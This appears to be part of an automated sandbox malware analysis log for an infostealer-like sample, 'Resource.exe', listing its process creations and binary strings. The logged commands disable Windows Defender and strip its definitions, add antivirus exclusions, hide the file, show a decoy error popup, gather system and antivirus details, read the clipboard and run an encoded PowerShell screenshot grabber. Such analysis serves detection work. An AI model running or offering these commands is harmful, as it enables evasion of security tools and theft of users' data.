              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\Resource.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: Resource.exeVirustotal: Detection: 71%
              Source: Resource.exeReversingLabs: Detection: 65%
              Source: Resource.exeString found in binary or memory: set-addPolicy
              Source: Resource.exeString found in binary or memory: id-cmc-addExtensions
              Source: Resource.exeString found in binary or memory: --help
              Source: Resource.exeString found in binary or memory: --help
              Source: Resource.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
              Source: Resource.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
              Source: Resource.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: C:\Users\user\Desktop\Resource.exeFile read: C:\Users\user\Desktop\Resource.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Resource.exe "C:\Users\user\Desktop\Resource.exe"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Users\user\Desktop\Resource.exe "C:\Users\user\Desktop\Resource.exe"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\Resource.exe""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\Resource.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB5E2.tmp" "c:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
